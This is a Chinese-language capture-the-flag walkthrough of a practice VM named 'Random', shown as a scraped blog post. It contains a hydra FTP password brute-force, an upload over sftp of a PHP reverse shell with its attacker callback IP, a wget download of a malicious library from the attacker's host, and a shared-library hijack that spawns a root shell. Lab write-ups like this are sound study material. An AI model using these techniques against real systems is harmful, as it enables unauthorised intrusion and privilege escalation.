4c:95:57:f4:38:a3:ce:ae:f0:e2:a6:d9:71:42:07:c5 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINZ6OAWr1xkHzpp4wdSCAOdwflN1vXUg4\/YlNvhEl1pN\n80\/tcp open http syn-ack nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -q\n^C\n[!] Keyboard interrupt detected, terminating.<\/code><\/pre>\n\u4e0d\u7528\u626b\u4e86\uff0c\u4f30\u8ba1\u662f\u6ca1\u6709\u70b9\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP \n<pre>\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n<\/pre><\/code><\/pre>\n\u5f97\u5230\u4e24\u4e2a\u7528\u6237\u540d\uff1a<\/p>\n
eleanor\nalan<\/code><\/pre>\n\u5176\u4e2deleanor<\/code>\u65e0ssh\u6743\u9650\u3002<\/p>\n\u654f\u611f\u7aef\u53e3<\/h3>\n
\u4f7f\u7528\u9ed8\u8ba4\u7528\u6237\u767b\u5f55ftp\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP \nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||48644|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n550 Failed to change directory.<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u76ee\u5f55\uff0c\u4f46\u662f\u65e0\u6cd5\u767b\u5f55\u3002<\/p>\n
\u7206\u7834ftp<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ hydra -L user -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP -f\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-12 03:01:59\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2\/p:14344399), ~1793050 tries per task\n[DATA] attacking ftp:\/\/192.168.10.103:21\/\n[STATUS] 276.00 tries\/min, 276 tries in 00:01h, 28688522 to do in 1732:24h, 16 active\n[21][ftp] host: 192.168.10.103 login: eleanor password: ladybug\n[STATUS] attack finished for 192.168.10.103 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-12 03:03:35<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\n
eleanor\nladybug<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||30985|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||30792|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 .\ndrwxr-xr-x 3 0 113 4096 Oct 19 2020 ..\n-rw-r--r-- 1 33 33 185 Oct 19 2020 index.html\n226 Directory send OK.\nftp> get index.html\nlocal: index.html remote: index.html\n229 Entering Extended Passive Mode (|||8241|)\n150 Opening BINARY mode data connection for index.html (185 bytes).\n100% |************************************************************************************************************************************************| 185 108.44 KiB\/s 00:00 ETA\n226 Transfer complete.\n185 bytes received in 00:00 (53.08 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ cat index.html \n<pre>\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n<\/pre><\/code><\/pre>\n\u53cd\u5f39shell<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e0d\u80fd\u8fdb\u884c\u4e0a\u4f20\uff0c\u6743\u9650\u4e0d\u8db3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP \nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||15374|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n250 Directory successfully changed.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||10218|)\n550 Permission denied.\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ head revshell.php \n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.102'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2a\u7528\u6237 ssh \u767b\u5f55\uff0c\u53d1\u73b0\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ssh eleanor@$IP \nThe authenticity of host '192.168.10.103 (192.168.10.103)' can't be established.\nED25519 key fingerprint is SHA256:v2xcWcAAUcAUpB1Nz4duz+QZL1zveUkV\/SmLUqBhuUc.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.10.103' (ED25519) to the list of known hosts.\neleanor@192.168.10.103's password: \nThis service allows sftp connections only.\nConnection to 192.168.10.103 closed.<\/code><\/pre>\n\u4e0d\u51fa\u610f\u6599\u5931\u8d25\u4e86\uff0c\u4f46\u662f\u5f97\u5230\u4e86\u4e00\u4e2a\u63d0\u793a\uff0c\u4f7f\u7528sftp<\/code>\u53ef\u4ee5\u8fde\u63a5\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ sftp eleanor@$IP\neleanor@192.168.10.103's password: \nConnected to 192.168.10.103.\nsftp> dir\nhtml \nsftp> cd html\nsftp> put revshell.php \nUploading revshell.php to \/html\/revshell.php\nrevshell.php 100% 3912 1.9MB\/s 00:00 \nsftp> dir\nindex.html revshell.php \nsftp> exit<\/code><\/pre>\n\u4e0a\u4f20\u6210\u529f\uff0c\u8bbf\u95ee\u6fc0\u6d3b\u4e00\u4e0b\u5373\u53ef\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP\/revshell.php\n<html>\n<head><title>504 Gateway Time-out<\/title><\/head>\n<body bgcolor="white">\n<center><h1>504 Gateway Time-out<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@random:\/$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nalan:x:1000:1000:alan,,,:\/srv\/ftp:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\neleanor:x:1001:1001:,,,:\/srv\/ftp:\/bin\/bash\n(remote) www-data@random:\/$ ls -la \/home\ntotal 16\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 19 2020 ..\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 alan\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 eleanor\n(remote) www-data@random:\/$ cd \/home\/alan\n(remote) www-data@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n(remote) www-data@random:\/home\/alan$ cat root.h\nvoid makemeroot();\n(remote) www-data@random:\/home\/alan$ cat rooter.o \nELF>\ufffd@@\nUH\ufffd\ufffdH\ufffd=\ufffd\ufffd]\ufffdSUCCESS!! But I need to finish and implement this functionGCC: (Debian 8.3.0-6) 8.3.0zRx\nN A\ufffdC\n\ufffd\ufffd\n+rooter.cmakemeroot_GLOBAL_OFFSET_TABLE_puts\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\n \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd .symtab.strtab.shstrtab.rela.text.data.bss.rodata.comment.note.GNU-stack.rela.eh_frame @80\n&SS1X90\ufffdB\ufffdW\ufffdR@h\n\ufffd \n 0\ufffda(remote) www-data@random:\/home\/alan$ cd ..\/eleanor\/\n(remote) www-data@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 eleanor eleanor 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19 2020 .bashrc\n-rw-r--r-- 1 eleanor eleanor 807 Oct 19 2020 .profile\n-rw------- 1 eleanor eleanor 80 Oct 19 2020 note.txt\n-rw------- 1 eleanor eleanor 14 Oct 19 2020 user.txt\n(remote) www-data@random:\/home\/eleanor$ sudo -l\nbash: sudo: command not found<\/code><\/pre>\nsu \u5207\u6362\u7528\u6237<\/h3>\n(remote) www-data@random:\/var\/www\/html$ ls -la \/srv\/ftp\ntotal 12\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\n(remote) www-data@random:\/var\/www\/html$ cd \/srv\/ftp\/html\n(remote) www-data@random:\/srv\/ftp\/html$ ls -la\ntotal 16\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 .\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 ..\n-rw-r--r-- 1 www-data www-data 185 Oct 19 2020 index.html\n-rw-r--r-- 1 eleanor eleanor 3912 Sep 12 03:15 revshell.php\n(remote) www-data@random:\/srv\/ftp\/html$ su eleanor\nPassword: \neleanor@random:~\/html$ cd ~\neleanor@random:~$ ls -la\ntotal 12\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\neleanor@random:~$ cd \/home\/eleanor\/\neleanor@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 eleanor eleanor 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19 2020 .bashrc\n-rw------- 1 eleanor eleanor 80 Oct 19 2020 note.txt\n-rw-r--r-- 1 eleanor eleanor 807 Oct 19 2020 .profile\n-rw------- 1 eleanor eleanor 14 Oct 19 2020 user.txt\neleanor@random:\/home\/eleanor$ cat user.txt \nihavethapowah\neleanor@random:\/home\/eleanor$ cat note.txt \nalan disabled my access via SSH but not my account.\nHe is a bad admin!\n-eleanor<\/code><\/pre>\n\u52ab\u6301\u94fe\u63a5\u5e93\u63d0\u6743<\/h3>\n(remote) eleanor@random:\/home\/eleanor$ cd ..\/alan\/\n(remote) eleanor@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\n(remote) eleanor@random:\/home\/alan$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.104 - - [12\/Sep\/2024 03:27:15] "GET \/random HTTP\/1.1" 200 -<\/code><\/pre>\n\u4f20\u8fc7\u6765\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff0c\u4f7f\u7528ida<\/code>\u53cd\u7f16\u8bd1\u4e86\u4e00\u4e0b\uff1a<\/p>\n\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v3; \/\/ ST1C_4\n time_t v4; \/\/ rdi\n\n v3 = atoi(argv[1]);\n v4 = time(0LL);\n srand(v4);\n if ( v3 == rand() % 9 + 1 )\n makemeroot(v4);\n else\n puts("Wrong number");\n return 0;\n}<\/code><\/pre>\n\u903b\u8f91\u5f88\u7b80\u5355\uff0c\u5c31\u662f\u731c\u6570\uff0c\u968f\u4fbf\u9009\u4e00\u4e2a1~9<\/code>\u7684\u6570\u5b57\u57fa\u672c\u4e0a\u662f\u5fc5\u4e2d\u7684\uff0c\u4f46\u662f\u6ca1\u6709\u9690\u85cf\u53ef\u4ee5\u83b7\u53d6shell\u7684\u51fd\u6570\u6216\u8005\u65b9\u6cd5\uff0c\u67e5\u770b\u4e00\u4e0b\u94fe\u63a5\u5e93\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ldd random\n linux-vdso.so.1 (0x00007ffd82952000)\n librooter.so => not found\n libc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fc9fa374000)\n \/lib64\/ld-linux-x86-64.so.2 (0x00007fc9fa57a000)<\/code><\/pre>\n\u627e\u4e00\u4e0b\u8fd9\u4e2a\u6ca1\u627e\u5230\u7684\uff01<\/p>\n
(remote) eleanor@random:\/home\/alan$ ldd random\n linux-vdso.so.1 (0x00007ffd348d4000)\n librooter.so => \/lib\/librooter.so (0x00007f69e6101000)\n libc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007f69e5f40000)\n \/lib64\/ld-linux-x86-64.so.2 (0x00007f69e6112000)\n(remote) eleanor@random:\/home\/alan$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 \/lib\/librooter.so<\/code><\/pre>\n\u53d1\u73b0\u53ef\u5199\uff0c\u5c1d\u8bd5\u52ab\u6301\u94fe\u63a5\u5e93\uff1a<\/p>\n
(remote) eleanor@random:\/tmp$ nano exp.c\nUnable to create directory \/srv\/ftp\/.local\/share\/nano\/: No such file or directory\nIt is required for saving\/loading search history or cursor positions.\n\nPress Enter to continue\n\n(remote) eleanor@random:\/tmp$ cat exp.c\n#include <stdlib.h>\n\nvoid makemeroot()\n{\n setuid(0);\n setgid(0);\n system("\/bin\/bash");\n}\n(remote) eleanor@random:\/tmp$ gcc -shared exp.c -o \/lib\/librooter.so\nexp.c: In function \u2018makemeroot\u2019:\nexp.c:5:2: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n setuid(0);\n ^~~~~~\n setenv\nexp.c:6:2: warning: implicit declaration of function \u2018setgid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n setgid(0);\n ^~~~~~\n setenv\ncollect2: fatal error: cannot find 'ld'\ncompilation terminated.\n(remote) eleanor@random:\/tmp$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 \/lib\/librooter.so<\/code><\/pre>\n\u53d1\u73b0\u6ca1\u6210\u529f\uff0c\u672c\u5730\u94fe\u63a5\u4e00\u4e0b\u518d\u4f20\u8fc7\u53bb\uff1a<\/p>\n
# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gcc -shared a.c -o librooter.so \na.c: In function \u2018makemeroot\u2019:\na.c:5:9: warning: implicit declaration of function \u2018setuid\u2019 [-Wimplicit-function-declaration]\n 5 | setuid(0);\n | ^~~~~~\na.c:6:9: warning: implicit declaration of function \u2018setgid\u2019 [-Wimplicit-function-declaration]\n 6 | setgid(0);\n | ^~~~~~\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.103 - - [12\/Sep\/2024 03:38:33] "GET \/librooter.so HTTP\/1.1" 200 -\n\n# eleanor\n(remote) eleanor@random:\/tmp$ cd \/lib\n(remote) eleanor@random:\/lib$ wget http:\/\/192.168.10.102:8888\/librooter.so\n(remote) eleanor@random:\/lib$ ls -la librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 librooter.so\n(remote) eleanor@random:\/lib$ mv librooter.so librooter.so.bak\n(remote) eleanor@random:\/lib$ mv librooter.so.1 librooter.so\n(remote) eleanor@random:\/lib$ ls -la librooter.so\n-rw-rw-rw- 1 eleanor eleanor 15480 Sep 12 03:37 librooter.so\n(remote) eleanor@random:\/lib$ chmod +x librooter.so<\/code><\/pre>\n\u5c1d\u8bd5\u591a\u6b21\u8fd0\u884c\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u83b7\u53d6shell\uff01<\/p>\n
<\/div><\/p>\n\u62ff\u4e0b\u62ff\u4e0b\uff01<\/p>\n
root@random:\/home\/alan# ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\nroot@random:\/home\/alan# cat note.txt \nI need to finish random program.\nNow it generates a random number between 1-10 and it compares\nthis number with my number.\nI will be happy if i guess the number.\nroot@random:\/home\/alan# cd \/root\nroot@random:\/root# ls -la\ntotal 24\ndrwx------ 3 root root 4096 Oct 19 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 16 Oct 19 2020 root.txt<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Random \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random] \u2514\u2500$ rus […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-806","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=806"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions"}],"predecessor-version":[{"id":807,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions\/807"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=806"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240912151640820\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544480.png\")
<\/div><\/p>\n![\"image-20240912154255749\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544481.png\")
<\/div><\/p>\n